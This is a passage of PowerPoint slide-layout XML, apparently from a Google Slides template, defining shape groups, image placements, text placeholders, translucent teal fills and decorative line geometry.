          <a:xfrm>
            <a:off x="1284000" y="1750091"/>
            <a:ext cx="6576000" cy="1049400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21DFD8">
              <a:alpha val="21520"/>
            </a:srgbClr>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchorCtr="0" anchor="b" bIns="91425" lIns="91425" spcFirstLastPara="1" rIns="91425" wrap="square" tIns="91425">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr lvl="0" algn="ctr">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="9600"/>
              <a:buNone/>
              <a:defRPr sz="6000">
                <a:latin typeface="Albert Sans Light"/>
                <a:ea typeface="Albert Sans Light"/>
                <a:cs typeface="Albert Sans Light"/>
                <a:sym typeface="Albert Sans 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1" name="Google Shape;251;p11"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1284000" y="2896309"/>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252" name="Google Shape;252;p11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2564774" cy="5057049"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2564774" cy="5057049"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="253" name="Google Shape;253;p11"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="131200" y="3929450"/>
              <a:ext cx="1244252" cy="1127599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="254" name="Google Shape;254;p11"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="5400000">
              <a:off x="-75050" y="75050"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="255" name="Google Shape;255;p11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="579525" y="261300"/>
            <a:ext cx="7980950" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="256" name="Google Shape;256;p11"/>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257" name="Google Shape;257;p11"/>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258" name="Google Shape;258;p11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7319840" y="4523368"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="259" name="Google Shape;259;p11"/>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1"/>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1"/>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1"/>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3" name="Google Shape;263;p11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm flipH="1">
            <a:off x="1172390" y="458868"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="264" name="Google Shape;264;p11"/>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1"/>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1"/>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1"/>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8" name="Google Shape;268;p11"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="8730053" y="6"/>
            <a:ext cx="261257" cy="5143447"/>
            <a:chOff x="221120" y="-9"/>
            <a:chExt cx="454360" cy="3595559"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="269" name="Google Shape;269;p11"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="667991" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490"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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="-9"/>
              <a:ext cx="7489" cy="1304377"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1304377" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1304378"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="130437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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="1467312"/>
              <a:ext cx="7489" cy="762341"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="762341" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="762342"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="76234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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="581446" y="2411718"/>
              <a:ext cx="7489" cy="1183001"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1183001" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1183002"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="118300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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504887" y="-9"/>
              <a:ext cx="7489" cy="1833943"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1833943" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1833943"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="18339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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="504887" y="2066710"/>
              <a:ext cx="7489" cy="1528840"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1528840" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1528840"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="15288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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442475" y="-9"/>
              <a:ext cx="7489" cy="1054974"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1054974" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="1054975"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="10549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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="442475" y="1266127"/>
              <a:ext cx="7489" cy="2328592"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2328592" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2328593"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="232859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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371741" y="-9"/>
              <a:ext cx="7489" cy="2570513"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="2570513" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="2570514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="25705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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="371741" y="2829052"/>
              <a:ext cx="7489" cy="766498"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="766498" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7490" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7490" y="766499"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="7664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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288525" y="-9"/>
              <a:ext cx="7489" cy="1514707"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1514707" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1514708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="151470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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="288525" y="1874670"/>
              <a:ext cx="7489" cy="1720049"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="1720049" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489" y="1720049"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="17200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1"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="221120" y="-9"/>
              <a:ext cx="7489" cy="3594728"/>
            </a:xfrm>
            <a:custGeom>
              <a:rect b="b" l="l" r="r" t="t"/>
              <a:pathLst>
                <a:path extrusionOk="0" h="3594728" w="7489">
                  <a:moveTo>
                    <a:pt x="0" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="7489" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="7489"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82" name="Shape 2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83" name="Shape 283"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="284" name="Google Shape;284;p13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="2714875" cy="5167799"/>
            <a:chOff x="0" y="0"/>
            <a:chExt cx="2714875" cy="5167799"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="285" name="Google Shape;285;p13"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="64000"/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm>
              <a:off x="0" y="4040200"/>
              <a:ext cx="1244252" cy="1127599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="286" name="Google Shape;286;p13"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="0" y="0"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="287" name="Google Shape;287;p13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="307577" y="261300"/>
            <a:ext cx="8549992" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="288" name="Google Shape;288;p13"/>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289" name="Google Shape;289;p13"/>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290" name="Google Shape;290;p13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="1287200"/>
            <a:ext cx="7211623" cy="3654310"/>
            <a:chOff x="1727190" y="1287200"/>
            <a:chExt cx="7211623" cy="3654310"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="291" name="Google Shape;291;p13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1727190" y="4780230"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="292" name="Google Shape;292;p13"/>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3"/>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3"/>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3"/>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6" name="Google Shape;296;p13"/>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm rot="5400000">
              <a:off x="8372190" y="1692543"/>
              <a:ext cx="971965" cy="161280"/>
              <a:chOff x="6413465" y="539505"/>
              <a:chExt cx="971965" cy="161280"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="297" name="Google Shape;297;p13"/>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3"/>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3"/>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3"/>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01" name="Google Shape;301;p13"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="10800000">
            <a:off x="8693266" y="3293176"/>
            <a:ext cx="328412" cy="1857425"/>
            <a:chOff x="965726" y="-1686"/>
            <a:chExt cx="328412" cy="1857425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="302" name="Google Shape;302;p13"/>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3"/>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3"/>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3"/>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3"/>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7" name="Google Shape;307;p1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308" name="Google Shape;308;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716617" y="2148200"/>
            <a:ext cx="24162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9" name="Google Shape;309;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="2" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3363909" y="2148200"/>
            <a:ext cx="24162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0" name="Google Shape;310;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="3" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716617" y="3909000"/>
            <a:ext cx="24162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1" name="Google Shape;311;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="4" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360521" y="3909000"/>
            <a:ext cx="24162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2" name="Google Shape;312;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="5" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011183" y="2148200"/>
            <a:ext cx="24162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 name="Google Shape;313;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="6" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011183" y="3909000"/>
            <a:ext cx="24162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4" name="Google Shape;314;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="7" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716617" y="1287208"/>
            <a:ext cx="734700" cy="447600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21DFD8">
              <a:alpha val="21520"/>
            </a:srgbClr>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 name="Google Shape;315;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="8" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716617" y="3047941"/>
            <a:ext cx="734700" cy="447600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21DFD8">
              <a:alpha val="21520"/>
            </a:srgbClr>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 name="Google Shape;316;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="9" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360513" y="1287208"/>
            <a:ext cx="734700" cy="447600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21DFD8">
              <a:alpha val="21520"/>
            </a:srgbClr>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7" name="Google Shape;317;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="13" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360513" y="3047941"/>
            <a:ext cx="734700" cy="447600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21DFD8">
              <a:alpha val="21520"/>
            </a:srgbClr>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8" name="Google Shape;318;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="14" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011191" y="1287208"/>
            <a:ext cx="734700" cy="447600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21DFD8">
              <a:alpha val="21520"/>
            </a:srgbClr>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9" name="Google Shape;319;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="15" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011191" y="3047941"/>
            <a:ext cx="734700" cy="447600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21DFD8">
              <a:alpha val="21520"/>
            </a:srgbClr>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0" name="Google Shape;320;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="16" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716617" y="1737650"/>
            <a:ext cx="2416200" cy="48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1" name="Google Shape;321;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="17" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360521" y="1737650"/>
            <a:ext cx="2416200" cy="48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2" name="Google Shape;322;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="18" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011183" y="1737650"/>
            <a:ext cx="2416200" cy="48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3" name="Google Shape;323;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="19" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="716617" y="3498425"/>
            <a:ext cx="2416200" cy="48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4" name="Google Shape;324;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="20" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3360521" y="3498425"/>
            <a:ext cx="2416200" cy="48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5" name="Google Shape;325;p13"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="21" type="subTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6011183" y="3498425"/>
            <a:ext cx="2416200" cy="48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ther 1">
  <p:cSld name="CUSTOM_10">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="326" name="Shape 326"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="327" name="Google Shape;327;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-2" y="-12125"/>
            <a:ext cx="9144002" cy="5167749"/>
            <a:chOff x="-2" y="-12125"/>
            <a:chExt cx="9144002" cy="5167749"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="328" name="Google Shape;328;p14"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill>
            <a:blip r:embed="rId2">
              <a:alphaModFix/>
            </a:blip>
            <a:stretch>
              <a:fillRect/>
            </a:stretch>
          </p:blipFill>
          <p:spPr>
            <a:xfrm rot="10800000">
              <a:off x="-2" y="4028025"/>
              <a:ext cx="1244252" cy="1127599"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="329" name="Google Shape;329;p14"/>
            <p:cNvPicPr preferRelativeResize="0"/>
            <p:nvPr/>
          </p:nvPicPr>
          <p:blipFill rotWithShape="1">
            <a:blip r:embed="rId2">
              <a:alphaModFix amt="37000"/>
            </a:blip>
            <a:srcRect b="35662" l="0" r="38279" t="0"/>
            <a:stretch/>
          </p:blipFill>
          <p:spPr>
            <a:xfrm flipH="1" rot="10800000">
              <a:off x="6429125" y="-12125"/>
              <a:ext cx="2714875" cy="2564774"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln>
              <a:noFill/>
            </a:ln>
          </p:spPr>
        </p:pic>
      </p:grpSp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="330" name="Google Shape;330;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="579525" y="261300"/>
            <a:ext cx="7980950" cy="4595775"/>
            <a:chOff x="579525" y="261300"/>
            <a:chExt cx="7980950" cy="4595775"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="331" name="Google Shape;331;p14"/>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332" name="Google Shape;332;p14"/>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333" name="Google Shape;333;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1727190" y="4442730"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="334" name="Google Shape;334;p14"/>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4"/>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4"/>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4"/>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8" name="Google Shape;338;p14"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7044690" y="458868"/>
            <a:ext cx="971965" cy="161280"/>
            <a:chOff x="6413465" y="539505"/>
            <a:chExt cx="971965" cy="161280"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="339" name="Google Shape;339;p14"/>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4"/>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4"/>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4"/>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3" name="Google Shape;343;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1552763" y="1729025"/>
            <a:ext cx="4456800" cy="78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4" name="Google Shape;344;p14"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph hasCustomPrompt="1" idx="2" type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6162038" y="1729025"/>
            <a:ext cx="1429200" cy="1162200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="21DFD8">
              <a:alpha val="2152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atin typeface="Albert Sans Light"/>
